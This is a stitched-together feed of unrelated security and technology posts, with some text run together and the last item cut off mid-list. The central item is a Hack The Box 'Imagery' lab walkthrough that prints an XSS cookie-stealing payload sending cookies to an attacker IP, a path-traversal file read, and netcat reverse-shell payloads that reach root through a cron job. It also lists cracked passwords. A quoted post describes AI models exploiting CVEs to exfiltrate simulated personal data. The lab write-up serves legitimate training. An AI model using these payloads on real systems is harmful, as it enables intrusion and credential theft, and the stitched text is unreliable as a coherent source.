Ukrainian forces have destroyed an Iranian-made Shahed-107 attack drone using a STING interceptor drone during active combat operations, according to a report by the Ukrainian defense outlet Militarniy. The interception was carried out by fighters from the Sky Wars unit of the 47th Mechanized Brigade “Magura,” who used the STING drone interceptor to shoot down […]
Security teams are under constant pressure to do more with the same resources. Manual processes, fragmented tools, and inefficient workflows can slow teams down and pull focus away from what matters most.
In this live webinar, experienced security practitioners share how they’ve escaped the constraints of limited
The post [Webinar] Doing More With Less: How Security Teams Escape Manual Work with Efficient Workflows appeared first on Security Boulevard.
Learn about the key differences between DAST and pentesting, the emerging role of AI pentesting, their roles in security testing, and which is right for your business.
The post DAST vs Penetration Testing: Key Differences in 2026 appeared first on Security Boulevard.
In this write-up, we will explore the “Imagery” machine from Hack The Box, categorised as a Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the “Imagery” machine from Hack The Box by achieving the following objectives:
User Flag:
After gaining an initial foothold through weaknesses in the web application, access is gradually expanded beyond a standard user account. By leveraging exposed application data and mismanaged credentials, lateral movement becomes possible within the system. This progression ultimately leads to access to a regular system user account, where the user flag can be retrieved, marking the successful completion of the first objective.
Root Flag:
With user-level access established, further analysis reveals misconfigured privileges and trusted system utilities that can be abused. By carefully interacting with these elevated permissions and understanding how system-level automation is handled, full administrative control of the machine is achieved. This final escalation allows access to the root account and the retrieval of the root flag, completing the machine compromise.
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Loginnmap -sC -sV -oA initial 10.129.3.10Nmap Output:
┌─[dark@parrot]─[~/Documents/htb/imagery]
└──╼ $nmap -sC -sV -oA initial 10.129.3.10
# Nmap 7.94SVN scan initiated Fri Jan 23 23:04:24 2026 as: nmap -sC -sV -oA initial 10.129.3.10
Nmap scan report for 10.129.3.10
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:94:fb:70:36:1a:26:3c:a8:3c:5a:5a:e4:fb:8c:18 (ECDSA)
|_ 256 c2:52:7c:42:61:ce:97:9d:12:d5:01:1c:ba:68:0f:fa (ED25519)
8000/tcp open http-alt Werkzeug/3.1.3 Python/3.12.7
|_http-title: Image Gallery
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 NOT FOUND
| Server: Werkzeug/3.1.3 Python/3.12.7
| Date: Sat, 24 Jan 2026 00:25:22 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 207
| Connection: close
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.1.3 Python/3.12.7
| Date: Sat, 24 Jan 2026 00:25:15 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 146960
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Image Gallery</title>
| <script src="static/tailwind.js"></script>
| <link rel="stylesheet" href="static/fonts.css">
| <script src="static/purify.min.js"></script>
| <style>
| body {
| font-family: 'Inter', sans-serif;
| margin: 0;
| padding: 0;
| box-sizing: border-box;
| display: flex;
| flex-direction: column;
| min-height: 100vh;
| position: fixed;
| top: 0;
| width: 100%;
| z-index: 50;
|_ #app-con
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7Analysis:
Web Application Exploration:
Features the app’s slogan “Capture & Cherish Every Moment” in large white text, followed by a description: “Your personal online gallery, designed for simplicity and beauty. Upload, organise, and relive your memories with ease.” Below that, a white section titled “Powerful Features at Your Fingertips” with three icons (a landscape image frame, a padlock for security, and a rocket for speed/performance). The navigation bar at the top includes “Home,” “Login,” and “Register.”
Centred white form on blue background titled “Register”. Fields: “Email ID” (placeholder: “Enter your email ID”) and “Password” (placeholder: “Enter your password” with eye icon for visibility). Blue “Register” button. ja
Fields pre-filled: “Email ID” as “dark@imagery.htb” and masked “Password”. Blue “Register” button.
Similar to register, titled “Login”. Fields pre-filled: “Email ID” as “dark@imagery.htb” and masked “Password”. Blue “Login” button, plus “Don’t have an account? Register here” link. Top nav: “Home”, “Login”, “Register”.
White background with title “Your Image Gallery”. A card message: “No images uploaded yet. Go to the ‘Upload’ page to add some!” Logged-in nav: “Home”, “Gallery”, “Upload”, “Logout” (red button).
Client-side JavaScript source code fetching and displaying admin bug reports from /admin/bug_reports with error handling and UI rendering logic.
JavaScript function handleDownloadUserLog redirects to /admin/get_system_log with a crafted log_identifier parameter based on username.
404 Not Found response when accessing the root /admin endpoint directly.
JSON access denied response (“Administrator privileges required”) when trying to access /admin/users as a non-admin user.
405 Method Not Allowed error on GET request to /report_bug, indicating the endpoint exists but requires a different HTTP method (likely POST).
App footer section showing copyright “© 2026 Imagery”, Quick Links (Home, Gallery, Upload, Report Bug), social media links, and contact info (support@imagery.com, fictional address).
“Report a Bug” form pre-filled with “bugName”: “dark” and the same XSS cookie-stealing payload in Bug Details, ready for submission.
Terminal session as user “dark@parrot” running a local HTTP server (sudo python3 -m http.server 80) in the ~/Documents/htb/imagery directory to serve files/listen for requests on port 80.
Burp Suite capture of a successful POST to /report_bug, submitting JSON with “bugName”: “dark” and XSS payload in “bugDetails” (<img src=x onerror=”document.location=’http://10.10.14.133:80/?cookie=’+document.cookie”>), response confirms submission with admin review message.
The response of successful POST to /report_bug, submitting an XSS payload in bugDetails to exfiltrate cookies via redirect to the attacker’s server.
Burp Suite capture of GET request to /auth_status returning JSON with logged-in user details (username “dark@imagery.htb“, isAdmin false).
Local Python HTTP server log showing incoming request from target (10.129.3.10) with stolen admin session cookie in query parameter, plus 404 for favicon.
Burp Suite capture of GET to /admin/ endpoint returning standard 404 Not Found HTML error page.
Successful GET to /admin/users with stolen admin cookie returning JSON user list (admin with isAdmin:true, testuser with isAdmin:false).
JavaScript source snippet of handleDownloadUserLog function redirecting to /admin/get_system_log with the encoded log_identifier parameter.
Failed LFI attempt on non-existent path returning 500 Internal Server Error with “Error reading file: 404 Not Found”.
Successful LFI exploitation via /admin/get_system_log retrieving /etc/passwd contents through path traversal payload “../../../../../../etc/passwd”.
Admin Panel interface (accessed with hijacked session) showing User Management with admin and testuser entries, plus empty Submitted Bug Reports section.
LFI retrieval of /proc/self/environ exposes environment variables (LANG, PATH, WEBHOME, WEBSHELL, etc.).
Retrieved db.json file contents via /admin/get_system_log path traversal, exposing user records with MD5-hashed passwords for admin and testuser, alongside an empty bug_reports array.
LFI retrieval of config.py source code exposing app constants like DATA_STORE_PATH=’db.json’, upload folders, and allowed extensions.
CrackStation online tool cracking the MD5 hash “2c65c8d7bfbca32a3ed42596192384f6” to plaintext “iambatman”.
Terminal output of failed SSH attempt as testuser@10.129.3.10 with publickey authentication denied.
Login page with Email ID pre-filled as “testuser@imagery.htb” and masked password field.
Empty Gallery page for logged-in user stating “No images uploaded yet. Go to the ‘Upload’ page to add some!”
Upload New Image form with “lips.png” selected (max 1MB, allowed formats listed), optional title/description, group “My Images”, uploading as Account ID e5f6g7h8.
Gallery view showing single uploaded image “lips” (red lips icon) with open context menu offering Edit Details, Convert Format, Transform Image, Delete Metadata, Download, and Delete.
Visual Image Transformation modal in crop mode with selectable box over the red lips image, parameters set to x:0 y:0 width:193 height:172.
Successful Burp POST to /apply_visual_transform with valid crop params returning new transformed image URL in /uploads/admin/transformed/.
Burp capture of POST to /apply_visual_transform with invalid crop “x”:”id” parameter resulting in 500 error (“invalid argument for option ‘-crop'”).
Burp capture of POST to /apply_visual_transform injecting “cat /etc/passwd” via crop “x” parameter, resulting in 500 error exposing command output snippet.
Attacker terminal running netcat listener on port 9007 (nc -lvnp 9007).
Burp capture of POST to /apply_visual_transform with reverse shell payload in crop “x” parameter (“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.133 9007 >/tmp/f”).
Successful reverse shell connection from target (10.129.3.10) to attacker listener on port 9007, landing as web@Imagery.
Detailed directory listing of /web (app root) revealing source files (api_*.py, app.py, config.py, db.json, utils.py) and directories (bot, env, static, system_logs, templates, uploads).
Directory listing of /web/bot showing admin.py file owned by web user.
Source code of admin.py revealing Selenium automation bot with hardcoded admin credentials (“admin@imagery.htb“:”strongsandofbeach”), bypass token, and Chrome binary path.
Detailed directory listing of /var showing system directories (backup, backups, cache, crash, lib, local, log, mail, opt, run, snap, spool, tmp).
Directory listing of /var/backup showing an encrypted backup file web_20250806_120723.zip.aes.
Directory listing of /var/backups showing multiple compressed APT/dpkg state archives (.gz files).
Target starting Python HTTP server on port 9007 to serve the encrypted backup file.
Wget successfully downloading the encrypted backup file web_20250806_120723.zip.aes (22MB) from the target’s HTTP server on port 9007.
File command confirming web_20250806_120723.zip.aes is AES-encrypted data created by pyAesCrypt 6.1.1.
Attempt to run dpyAesCrypt.py failing with ModuleNotFoundError for ‘pyAesCrypt’ (case-sensitive import issue).
Successful pip3 user installation of pyaescrypt-6.1.1 package.
Failed execution of dpyAesCrypt.py due to ModuleNotFoundError for ‘termcolor’ (missing import dependency).
Successful pip3 user installation of termcolor-3.3.0 package.
Custom pyAesCrypt brute-forcer discovering password “bestfriends” early in the wordlist.
Successful decryption of the AES backup using “bestfriends”, outputting the original web_20250806_120723.zip.
The cunzip extracting the decrypted backup archive, revealing full app source (api_*.py, app.py, config.py, db.json, utils.py), templates, system_logs, env, and compiled pycache files.
cat of decrypted db.json revealing user database with admin (hashed password), testuser (“iambatman”), and mark (another hashed password).
CrackStation results cracking MD5 hashes to “iambatman”, “supersmash”, and “spiderweb1234” (one unknown).
Successful su to mark using password “supersmash”, confirming uid/gid 1002.
Python one-liner (python3 -c ‘import pty;pty.spawn(“/bin/bash”)’) to spawn an interactive bash shell.
ls -al in /home/mark showing files including user.txt (likely containing the flag).
We can read the user flag by typing the “cat user.txt” command
Privilege Escalation:
sudo -l reveals that user mark can run /usr/local/bin/charcol as root without a password (NOPASSWD).
charcol help output describing the CLI tool for encrypted backups, with commands (shell, help) and options (-quiet, -R for reset).
Failed charcol shell passphrase attempts (“bestfriend”, “supermash”, “supersmash”) resulting in lockout after multiple errors.
sudo charcol -R resetting application password to default (“no password” mode) after system password verification.
sudo charcol -R resetting application password to default (“no password” mode) after system password verification.
Repeated sudo charcol -R successfully resetting to no password mode.
charcol interactive shell entry after initial setup, displaying ASCII logo and info message.
charcol help output explaining backup/fetch commands and “auto add” for managing automated (root) cron jobs, with security warnings.
Attacker terminal running netcat listener on port 9007 in preparation for reverse shell.
Successful “auto add” command creating a root cron job with reverse shell payload to attacker (10.10.14.133:9007), verified with system password “supersmash”.
Successful privilege escalation to root via a malicious cron job triggered a reverse shell, followed by reading the root flag from /root/root.txt
The post Hack The Box: Imagery Machine Walkthrough – Medium Difficulity appeared first on Threatninja.net.
Artificial intelligence (AI) systems rarely fail in obvious ways. No red error screen. No crashed service. No broken button. They fail quietly. Outputs look confident...Read More
The post Shift Left QA for AI Systems. Catching Model Risk Before Production appeared first on ISHIR | Custom AI Software Development Dallas Fort-Worth Texas.
The post Shift Left QA for AI Systems. Catching Model Risk Before Production appeared first on Security Boulevard.
Really interesting blog post from Anthropic:
In a recent evaluation of AI models’ cyber capabilities, current Claude models can now succeed at multistage attacks on networks with dozens of hosts using only standard, open-source tools, instead of the custom tools needed by previous generations. This illustrates how barriers to the use of AI in relatively autonomous cyber workflows are rapidly coming down, and highlights the importance of security fundamentals like promptly patching known vulnerabilities.
[…]
A notable development during the testing of Claude Sonnet 4.5 is that the model can now succeed on a minority of the networks without the custom cyber toolkit needed by previous generations. In particular, Sonnet 4.5 can now exfiltrate all of the (simulated) personal information in a high-fidelity simulation of the Equifax data breach—one of the costliest cyber attacks in history—using only a Bash shell on a widely-available Kali Linux host (standard, open-source tools for penetration testing; not a custom toolkit). Sonnet 4.5 accomplishes this by instantly recognizing a publicized CVE and writing code to exploit it without needing to look it up or iterate on it. Recalling that the original Equifax breach happened by exploiting a publicized CVE that had not yet been patched, the prospect of highly competent and fast AI agents leveraging this approach underscores the pressing need for security best practices like prompt updates and patches. ...
The post AIs are Getting Better at Finding and Exploiting Internet Vulnerabilities appeared first on Security Boulevard.
This one-time purchase delivers SSD speed, security tools, and CDN-backed performance without monthly fees.
The post Hostnirvana Offers Lifetime Hosting for Three Websites for Just $20 appeared first on TechRepublic.
This one-time purchase delivers SSD speed, security tools, and CDN-backed performance without monthly fees.
The post Hostnirvana Offers Lifetime Hosting for Three Websites for Just $20 appeared first on TechRepublic.
The Defense Logistics Agency — an organization responsible for supplying everything from spare parts to food and fuel — is turning to artificial intelligence and machine learning to fix a long-standing problem of predicting what the military needs on its shelves.
While demand planning accuracy currently hovers around 60%, DLA officials aim to push that baseline figure to 85% with the help of AI and ML tools. Improved forecasting will ensure the services have access to the right items exactly when they need them.
“We are about 60% accurate on what the services ask us to buy and what we actually have on the shelf. Part of that, then, is we are either overbuying in some capacity or we are under buying. That doesn’t help the readiness of our systems,” Maj. Gen. David Sanford, DLA director of logistics operations, said during the AFCEA NOVA Army IT Day event on Jan. 15.
Rather than relying mostly on historical purchase data, the models ingest a wide range of data that DLA has not previously used in forecasting. That includes supply consumption and maintenance data, operational data gleaned from wargames and exercises, as well as data that impacts storage locations, such as weather.
The models are tied to each weapon system and DLA evaluates and adjusts the models on a continuing basis as they learn.
“We are using AI and ML to ingest data that we have just never looked at before. That’s now feeding our planning models. We are building individual models, we are letting them learn, and then those will be our forecasting models as we go forward,” Sanford said.
Some early results already show measurable improvements. Forecasting accuracy for the Army’s Bradley Infantry Fighting Vehicle, for example, has improved by about 12% over the last four months, a senior DLA official told Federal News Network.
The agency has made the most progress working with the Army and the Air Force and is addressing “some final data-interoperability issues” with the Navy. Work with the Marine Corps is also underway.
“The Army has done a really nice job of ingesting a lot of their sustainment data into a platform called Army 360. We feed into that platform live data now, and then we are able to receive that live data. We are ingesting data now into our demand planning models not just for the Army. We’re on the path for the Navy, and then the Air Force is next. We got a little more work to do with Marines. We’re not as accurate as where we need to be, and so this is our path with each service to drive to that accuracy,” Sanford said.
Demand forecasting, however, varies widely across the services — the DLA official cautioned against directly comparing forecasting performance.
“When we compare services from a demand planning perspective, it’s not an apples-to-apples comparison. Each service has different products, policies and complexities that influence planning variables and outcomes. Broadly speaking, DLA is in partnership with each service to make improvements to readiness and forecasting,” the DLA official said.
The agency is also using AI and machine learning to improve how it measures true administrative and production lead times. By analyzing years of historical data, the tools can identify how industry has actually performed — rather than how long deliveries were expected to take — and factor that into DLA stock levels.
“When we put out requests, we need information back to us quickly. And then you got to hold us accountable to get information back to you too quickly. And then on the production lead times, they’re not as accurate as what they are. There’s something that’s advertised, but then there’s the reality of what we’re getting and is not meeting the target that that was initially contracted for,” Sanford said.
The post DLA turns to AI, ML to improve military supply forecasting first appeared on Federal News Network.
© Federal News Network
Ethereum’s network has been buzzing. Blocks are full, wallets show new activity, and on-chain counters are ticking up fast. But not all of that motion looks like real people using the chain.
In a recent blog post, researcher Andrey Sergeenkov warned that a recent Ethereum upgrade is being exploited to send tiny transactions that create misleading wallet history entries, a tactic known as address poisoning.
According to the expert, a big slice of the traffic may be the result of “dusting” or address poisoning attacks. Small, almost worthless transfers — sometimes less than a dollar — are being sent to a wide range of addresses.
Record-high Ethereum activity that everyone’s celebrating is an address poisoning attack.
– Over $740K already stolen, and growing – This became possible thanks to the Fusaka upgrade – This attack is ongoing right nowhttps://t.co/cqoEvqttQd
— Andrey Sergeenkov (@Nikopolos) January 19, 2026
These tiny transfers create fake-looking entries in a wallet’s history. People who skim their recent transactions or copy addresses from a short list of past contacts can be tricked into sending funds to a scammer by mistake. It is a basic trick that gets more power when fees fall.
Reports say that after recent updates and lower average gas costs, sending millions of tiny transactions became affordable. When fees drop, attackers can spray dust across large numbers of wallets and run follow-up scams at scale.
The tactic uses two steps: first, make a history entry that looks like a real counterparty; second, hope a user copies that wrong entry. Some attacks aim to deanonymize users, while others are pure bait to steal funds later.
An Ethereum wallet owner might glance at a list and use the wrong address. Or they might be prompted by a message that seems to match a past transfer. Either way, if funds are sent to the attacker, those funds are usually gone.
Reports estimate that hundreds of thousands of dollars have been siphoned from victims who fell for different versions of this trick. The sums are not always massive per case, but they add up when many victims are targeted.
Small Transfers From Strange Addresses
Look for small incoming transfers from addresses you do not recognize, especially when those transfers appear in large batches. Watch for identical token amounts or for many transfers with the same memo or pattern.
Wallets that show sudden clusters of tiny token receipts are worth extra caution. Security tools and some wallets can hide tiny transfers or warn users about unusual incoming dust. Use those features if they are available.
What Experts AdviseBased on reports, researchers urge people to verify the full address they are sending to, not just the start or end of it. Use address book features, QR codes, or trusted contacts to confirm destinations.
Avoid copying addresses from a short recent-history view. If you receive a small, unexpected deposit, take it as a warning sign, not an invitation.
Featured image from Pexels, chart from TradingView
Manus is adding app publishing that aims to turn a described app into an installable mobile build, handling packaging while you finish distribution in Google Play Console or App Store Connect and TestFlight.
The post You can publish apps from Manus without Xcode or Android Studio appeared first on Digital Trends.
Last Updated on January 20, 2026 by Narendra Sahoo
PCI penetration testing is performed to identify security vulnerabilities in line with PCI DSS requirements.
PCI DSS 4.0.1 penetration testing requirements are targeted at:
This is a controlled form of an ethical hacking exercise with the following objectives:
Overall, PCI DSS 4.0.1 is a set of 12 requirements distributed over six goals as a security standard for credit cards and debit cards. Not having proper documentation, poor protocols, or insufficient penetration testing may be among the reasons as to why PCI DSS audits fail.
| What it is | A controlled, authorized attack simulation against systems to identify exploitable security weaknesses |
|---|---|
| Purpose | To prove that security controls work in real-world conditions |
| PCI DSS reference | Requirement 11 (PCI DSS 4.0 and earlier versions) |
| Scope | Cardholder Data Environment (CDE) and connected systems |
| Outcome | Evidence of exploitable risk + remediation validation |
PCI DSS Requirement 11.3 penetration testing: the 11.3 requirement in PCI DSS explicitly mandates the active use of penetration testing at least once a year and major changes made to your organizations’ systems and tech stack.
A QSA is a qualified security assessor: the person who will approve all the things that you’re doing to say you’re passing the audit. An ASV is an external party that will do the vulnerability scan for your network that’s approved by the PCI Council.
Companies are often looking for a PCI DSS pentesting provider for their penetration testing objectives which can be achieved via internal vs external PCI penetration testing: Most organizations prefer to hire an external consultant to carry out their penetration testing. It is the standard procedure. For organizations wanting to reduce costs, they can consider doing a penetration test internally.
Carrying out penetration testing internally would be judged by the auditing team for PCI DSS later. The PCI DSS audit would scrutinize your internal penetration testing efforts and documentation to judge it for sufficient expertise and no conflict of interest.
Working with the auditor such as the QSA helps informing them beforehand of your intent to carry out penetration testing internally would support efforts to pass the PCI DSS audit. PCI compliance penetration testing
You must have sufficient qualifications to carry out penetration testing internally. One needs to be a security professional or have training in the official penetration training product. Other ways to prove sufficiency are effective work experience. Again, planning to work with the QSA by informing them beforehand is key. Companies must be aware of what evidence PCI auditors expect from penetration testing like these.
Criteria #2: No Conflict of Interest
The second criteria are no conflict of interest. That means there is no conflict of interest between the groups of people who built the systems for scope, as well as the penetration tester who is testing the system. Often a PCI auditor may give you a waiver. Being organizationally separate helps. In a small organization, the QSA typically does give a waiver if you don’t have enough people to prevent that conflict of interest.
Organizations achieve PCI DSS goals naturally via differentiated paths. Compliance requirements and implementation may differ in point in time; the value of penetration testing aims to uncover the areas and help organizations converge toward implementation that is identical if not extraneous in scope to compliance.
One can ideally think of penetration testing in a broader sense as an investigatory and study-based set of actions. In this manner, there are numerous benefits beyond merely identifying the areas where implementation of PCI DSS and compliance requirements differ.
| Trigger Event | Penetration Testing Requirement |
|---|---|
| Annually | Mandatory penetration test at least once every 12 months |
| Significant system change | Required after major infrastructure, application, or network changes |
| New payment application | Required before production use |
| Network segmentation changes | Required to validate segmentation effectiveness |
| Cloud / hosting changes | Required if CDE exposure or trust boundaries change |
A penetration testing routine for any companies’ PCI DSS implementation eventually leads to a deeper and better understanding of their respective security posture, generates reports and documentation for posterity, and improves the organization’s ability and willingness to deal effectively with payment card security and data.
One of the biggest misconceptions VISTA InfoSec always has to set straight with clients tackling PCI DSS is them treating it like a once-a-year event. PCI isn’t a point-in-time certification—it’s an ongoing operational requirement. What usually breaks compliance isn’t missing controls; it’s what happens after the audit. Quarterly ASV scans don’t get run; internal vulnerability assessments fall behind, and recurring reviews quietly stop. By the time the next assessment comes around, the controls exist—but the evidence doesn’t.
VISTA InfoSec frequently encounters this issue across PCI DSS assessments: we have worked for clients who had their ASV scans being used for internal vulnerabilities. ASV scans are very specific in what they’re meant to do. They only apply to externally exposed IP addresses. What they are not is a replacement for internal vulnerability scanning. PCI DSS is very clear about separating external exposure testing from internal risk discovery, and assessors see this mistake all the time. If you’re using ASV scans to justify skipping internal assessments, that’s a compliance issue waiting to happen.
Hence, VISTA InfoSec recommends a practical solution to treat ASV scans and internal vulnerability assessments as complementary controls with distinct objectives, not substitutes.
Penetration testing for PCI DSS follows the same format as it does in another context. Aims for PCI DSS penetration testing is the same as in other contexts.
It aims to uncover the vulnerabilities and flaws in the implementation of a PCI DSS based solution for companies. As companies protect their data and payment information via PCI DSS, penetration testing approaches uncover them and help an organization retain their security posture.
At VISTA InfoSec, we observed a common misconception when working over multiple PCI DSS client environments, where segmentation is often treated as a design assertion rather than a control that must be continuously proven.
Segmentation as a security control, not a design feature: Segmentation is only valid under PCI DSS if you can prove it works. That means testing it. Half-yearly segmentation penetration testing is required to demonstrate that traffic is limited exactly the way you say it is—between card and non-card environments and within internal CDE zones. Diagrams and documentation help, but they’re not enough. Assessors expect technical evidence that lateral movement is blocked in the real world.
Thus, the general penetration test conducted to assess an organization’s PCI DSS posture eventually refines it via the discovery of vulnerabilities, weaknesses, flaws, and potential exploits. PCI DSS compliance security posture testing and validation is key for assessing the effectiveness of the security posture of any organization aiming to assess their security posture for PCI DSS.
| Test Type | What is Tested | Why It matters |
|---|---|---|
| Network penetration testing | External and internal network defenses | Identifies perimeter and lateral movement risks |
| Application penetration testing | Payment applications and APIs | Detects logic flaws, injection, and data exposure |
| Segmentation testing | Isolation between CDE and non-CDE systems | Reduces PCI scope and attack surface |
| Authentication testing | Access controls and privilege escalation | Prevents unauthorized access to card data |
| Area | Vulnerability Scanning | Penetration Testing |
|---|---|---|
| Nature | Automated detection | Human-led exploitation |
| Depth | Identifies weaknesses | Proves real-world impact |
| Frequency | Quarterly (minimum) | Annual + after major changes |
| PCI Requirement | Req. 11.2 | Req. 11.4 |
| Outcome | Risk indicators | Confirmed security gaps |
In analogy terms, think of PCI DSS as the locks and safeguards one places on their company’s cardholder data. A penetration test, or testing in this context are the guided, overseen and managed deliberate attempts to attempt to break these locks to gauge vulnerabilities, identify flaws, and report them to improve security posture via finding gaps and weaknesses. PCI DSS penetration testing to validate real-world security controls involves testing PCI DSS safeguards against real attack scenarios.
| Evidence Item | What It Demonstrates |
|---|---|
| Scope definition | All relevant CDE systems were tested |
| Methodology | Industry-recognized testing approach used |
| Findings report | Identified vulnerabilities and exploit paths |
| Remediation evidence | Issues were fixed and verified |
| Retest results | Fixes are effective and durable |
Even if a company says they follow PCI DSS, there may very well be holes, misconfigurations, or ways attackers could sneak in.
| Failure | Why It Causes Audit Issues |
|---|---|
| Testing only externall | Internal threats are ignored |
| Excluding cloud components | Modern CDEs are hybri |
| No segmentation testing | PCI scope cannot be trusted |
| No retesting after fixes | Control effectiveness is unproven |
| Generic reports | Lack of PCI-specific relevance |
Under older models’ compliance was often point-in-time and evidence heavy. An added downside was that compliance was slow to adapt to real risk.
| Role | Responsibility | Why It Matters |
|---|---|---|
| Executive management | Approves scope, budget, and remediation timelines | PCI DSS places accountability at the governance level, not just IT |
| Compliance / GRC tea | Aligns testing with PCI DSS requirements and audit expectations | Ensures testing is evidence-ready, not just technically sound |
| Security team | Coordinates test execution and validate findings | Bridges technical results with business risk |
| External penetration testing provider | Conducts independent, qualified testing | Independence is required to ensure credibility and objectivity |
| System owners | Fix vulnerabilities and support retesti | Controls are only effective if remediation is verified |
| QSA / assessor | Reviews scope, results, and remediation evidence | Determines whether testing satisfies Requirement 11 |
Penetration testing is thus ideal for PCI DSS and this shift in emphasis. As it forces different implementations to converge toward real security. It exposes implementations where PCI DSS controls look right but fall short in behavior. Additionally, it validates whether your security posture technically resists attack.
| Area | Pre–PCI DSS 4.0 Approach | PCI DSS 4.0 Expectation |
|---|---|---|
| Testing mindset | Point-in-time compliance | Continuous validation of control effectiveness |
| Change-driven testing | Often informal or delayed | Explicitly required after significant changes |
| Cloud environments | Frequently under-scoped | Fully in-scope if they impact the CDE |
| Segmentation validation | Sometimes assumed | Must be actively proven through testing |
| Evidence quality | High-level reports accepted | Clear exploit paths, impact, and verification required |
| Retesting | Sometimes skipped | Mandatory to confirm fixes are effective |
All outcomes of penetration testing analysis aim to prove equivalence to the need to protect credit card data. Vulnerability analysis aims to locate and identify weaknesses and potential gaps, exploits that can lead to loss of security of credit card data.
Penetration testing and vulnerability analysis isn’t merely about just ticking up a compliance box. There are very real practical benefits arising out of doing this properly. Firstly, it is about protecting one’s cardholder data environment – CDE. A solid penetration is used to verify that access controls actually work for your card data on the need-to-know basis, not merely on paper. Obviously, a solid penetration testing campaign is necessary for proving that your systems, controls and processes protect cardholder data.
Another objective is to test segmentation across networked systems. When one validates segmentation via penetration testing, you prove and reduce the risk of insider threats. Segmentation is required to prove your organization effectively limits access to networks where credit card data is stored and transmitted. You’re proving that even if someone has access to part of the network, they can’t laterally move into systems that store, process, or transmit cardholder data.
Penetration testing also helps you identify common but high-impact web application vulnerabilities—things like SQL injection, broken authentication, and session management issues. These are exactly the kinds of weaknesses attackers look for, and PCI explicitly expects you to test them.
Being able to demonstrate that you regularly test your environment shows customers, partners, and your supply chain that you take data security seriously. That matters increasingly, especially when third-party risk is under scrutiny.
From a compliance standpoint, regular testing helps you maintain PCI DSS compliance over time, not just during audit season. It supports a more proactive security posture instead of reacting to findings once a year.
And finally, penetration testing is one of the most effective ways to uncover insecure configurations—across systems, networks, and applications—that might otherwise go unnoticed. These are often the exact issues that lead to audit findings or real-world breaches.
So overall, PCI testing isn’t just about passing an audit. It’s about proving that your controls actually work, in real conditions.
At VISTA InfoSec, we were called for a major enterprise who had experienced data breach even though certified in PCI DSS. After due investigation, our consultants observed that the breached card data was residing on systems not in scope. This happened as cardholder data discovery was limited to systems already assumed to be in scope. This is an issue we have seen across multiple clients over the past 15 years. Our clients had previously overlooked data drift, where card data spread into non-card environments via logs, backups, integrations, or analytics workflows.
In one representative case, transaction payloads containing partial PAN data were logged by an application middleware layer and forwarded to a centralized logging and analytics platform classified as out of scope. Over time, those logs were backed up to shared storage and replicated across regions, creating multiple unintended copies of card data outside the defined CDE.
Cardholder data discovery isn’t just about scanning systems you already believe are in scope. It’s about making sure card data hasn’t quietly drifted somewhere it shouldn’t be. That’s why CHD scans need to cover both card and non-card environments. They help confirm that sensitive data hasn’t been duplicated, stored unencrypted, or left behind in unexpected places—and they’re critical for validating where card data really exists when you’re making ROC assertions.
PCI DSS formally lists penetration testing as part of requirement 11.3, while most companies hire external consultants such as the ASV or a QSA; many are unaware companies can pentest internally. As part of compliance, your penetration testing will occur at least once a year and definitely after major changes to your systems and technologies.
Companies often prefer extensive penetration testing and are advised to do so working ahead of time with the QSAs to increase their chances of meeting compliance. Penetration testing for PCI DSS helps retain security posture, identify vulnerabilities, and ensure robust practices for maintaining credit card data security.
Need Expertise for Implementing PCI DSS 4.0.1?At VISTA InfoSec, we don’t help you prepare for an audit—we help you build security that stands up to real-world attacks. As PCI DSS threats become more automated and complex, organizations need more than checklists and templates. Whether your organization needs a PCI compliance security assessment to evaluate posture, or a waiver requirement for avoiding conflict of interest with your QSA for PCI DSS, to appropriate cardholder data environment penetration testing, we understand organizations requirements:
The result is not just PCI DSS 4.0.1 compliance, but a stronger, resilient cardholder data environment you can trust. Achieving continuous PCI compliance requires more than the right VAPT teams and collaboration; it needs vision and coherent approaches for your security posture and systems.
Want to learn more? Check out VISTA InfoSec’s YouTube Channel for simple explanations and expert guidance.
The post PCI DSS Penetration Testing Requirements Explained appeared first on Information Security Consulting Company - VISTA InfoSec.
Smart money doesn’t chase hype — it chooses structure, liquidity, and asymmetric risk. On Binance, that choice usually comes down to one critical decision: Spot trading or Futures trading?
Retail traders often frame this debate as simple — low risk vs high reward. Professionals know it’s far more nuanced. The real question isn’t which market is more profitable, but which market aligns with capital preservation, risk-adjusted returns, and scalable strategy execution.
In this in‑depth guide, we break down Spot vs Futures on Binance from the perspective of institutional traders, hedge funds, high‑net‑worth investors, and disciplined professionals — not gamblers.
By the end, you’ll know exactly where smart money actually trades, why, and how to position yourself accordingly.
Smart money uses both Spot and Futures on Binance — but for different objectives.
The edge comes from knowing when to use each market, not choosing only one.
Smart traders don’t rely on hype — they rely on frameworks. If you want more deep‑dive guides on Binance, crypto risk management, and professional‑grade trading strategies, follow this Medium profile now so you don’t miss the next article.
Spot trading on Binance involves buying or selling cryptocurrencies at the current market price, with immediate ownership of the underlying asset. When you buy BTC on the spot market, you actually own BTC — no contracts, no expiry, no liquidation risk.
This is the most straightforward and transparent form of crypto trading, which is why it remains the foundation of most professional portfolios.
Spot markets attract:
For smart money, spot trading is about positioning, not excitement.
One of the biggest advantages of spot trading is zero liquidation risk. Prices can move violently against you, but your position remains intact unless you choose to exit.
This is critical for professionals who prioritize survivability over short‑term performance.
Smart money often identifies structural trends early — Layer 2 adoption, Bitcoin halvings, ETF inflows, DeFi primitives, or real‑world asset tokenization.
Spot markets allow them to:
Risk is limited to the capital invested. There are no margin calls, funding rates, or forced liquidations to manage.
This simplicity is a feature, not a weakness.
Spot traders experience far less emotional pressure than leveraged traders.
This leads to:
